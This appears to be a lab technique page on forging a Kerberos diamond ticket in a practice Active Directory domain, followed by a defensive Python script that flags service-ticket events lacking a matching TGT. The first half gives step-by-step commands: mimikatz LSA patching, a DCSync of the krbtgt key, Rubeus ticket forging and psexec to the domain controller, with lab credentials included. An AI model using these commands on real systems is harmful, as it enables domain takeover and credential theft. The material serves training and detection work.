Technique Info

Diamond Ticket with Cobalt Strike and Rubeus.exe

  1. Use Cobalt Strike's mimikatz beacon command to patch LSA: mimikatz !lsadump::lsa /patch
  2. Use Cobalt Strike's mimikatz beacon command to retrieve the krbtgt user's AES256 key: mimikatz !lsadump::dcsync /user:dcorp\krbtgt
  3. Create the Diamond Ticket: execute-assembly /home/jorkle/Rubeus.exe diamond /krbkey:6a740ddbe25b6ea352b49fea0f6c8d3eb72104d152d6aca9d5c159b31f8a08d8 /user:robb.stark /password:sexywolfy /enctype:aes /ticketuser:administrator /domain:north.sevenkingdoms.local /dc:winterfell.north.sevenkingdoms.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /nowrap
  4. Copy the line highlighted in red from the output (the base64-encoded kirbi diamond ticket).
  5. Decode it to a file: echo "<base64 kirbi diamond ticket>" | base64 -d > ticket.kirbi
  6. Use ticketConverter.py to convert the kirbi ticket to a ccache: ticketConverter.py ./ticket.kirbi ./ticket.ccache
  7. Configure your Kerberos environment variable: export KRB5CCNAME="$(pwd)/ticket.ccache"
  8. Ensure your clock is synced with the server: sudo ntpdate 192.168.58.11
  9. Access the server with the diamond ticket (use the DC's full FQDN after the @): psexec.py north.sevenkingdoms.local/administrator@winterfell.north.sevenkingdoms.local -k -no-pass -target-ip 192.168.58.11
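From the defender's side, the tell-tale artefact of the procedure above is that the host obtains a legitimate TGT as one account (the /user in step 3) but then presents a ticket for a different account (the /ticketuser) that never requested a TGT of its own. The script below is an added example, not part of the original page or of Rubeus/Cobalt Strike: it applies the well-known TGT/TGS correlation heuristic to Windows Security events 4768 (TGT requested) and 4769 (service ticket requested) and flags a 4769 whose account has no matching 4768 from the same client address within the lookback window. The event records, timestamps and client addresses are constructed sample data, and the field layout is a simplified assumption rather than the real event XML.

```python
"""
Detection heuristic for forged Kerberos TGTs (golden/diamond tickets):
a service-ticket request (event 4769) for an account that never obtained
a TGT (event 4768) from the same client address inside a lookback window.
All records below are constructed sample data, not real telemetry.
"""
from datetime import datetime, timedelta

# Constructed sample DC events: (timestamp, event_id, account, client_ip).
# Real events carry more fields; this flat tuple is a simplifying assumption.
SAMPLE_EVENTS = [
    ("2024-01-01T10:00:00", 4768, "robb.stark", "192.168.58.50"),
    ("2024-01-01T10:00:05", 4769, "robb.stark", "192.168.58.50"),
    ("2024-01-01T10:02:00", 4768, "jon.snow", "192.168.58.51"),
    ("2024-01-01T10:03:10", 4769, "jon.snow", "192.168.58.51"),
    # Forged-ticket pattern: a service ticket for 'administrator' is requested
    # from a host that only ever obtained a TGT for 'robb.stark'.
    ("2024-01-01T10:05:00", 4769, "administrator", "192.168.58.50"),
]


def parse_event(rec):
    """Normalise one raw tuple into a dict with a real datetime."""
    ts, eid, account, ip = rec
    return {
        "ts": datetime.fromisoformat(ts),
        "event_id": eid,
        "account": account.lower(),
        "client_ip": ip,
    }


def find_tgs_without_tgt(events, lookback=timedelta(hours=10)):
    """Return 4769 records whose (account, client_ip) pair has no 4768
    within `lookback` (default 10h, the typical maximum TGT lifetime).

    Each finding also lists which accounts that client DID obtain TGTs for,
    which exposes the user/ticketuser mismatch of a diamond ticket."""
    latest_tgt = {}          # (account, ip) -> timestamp of most recent 4768
    tgt_accounts_by_ip = {}  # ip -> set of accounts that got a TGT
    findings = []

    for ev in sorted((parse_event(r) for r in events), key=lambda e: e["ts"]):
        key = (ev["account"], ev["client_ip"])
        if ev["event_id"] == 4768:
            latest_tgt[key] = ev["ts"]
            tgt_accounts_by_ip.setdefault(ev["client_ip"], set()).add(ev["account"])
        elif ev["event_id"] == 4769:
            tgt_ts = latest_tgt.get(key)
            if tgt_ts is None or ev["ts"] - tgt_ts > lookback:
                finding = dict(ev)
                finding["tgt_accounts_seen"] = sorted(
                    tgt_accounts_by_ip.get(ev["client_ip"], set()))
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in find_tgs_without_tgt(SAMPLE_EVENTS):
        print(f"{f['ts']} 4769 for {f['account']} from {f['client_ip']} "
              f"with no TGT; TGTs seen from this host: {f['tgt_accounts_seen']}")
```

In production this correlation has to be run over events from every DC in the site, because the 4768 and the 4769 can land on different controllers, and the lookback must cover TGT renewals; a miss on either point produces false positives rather than false negatives, so tune before alerting.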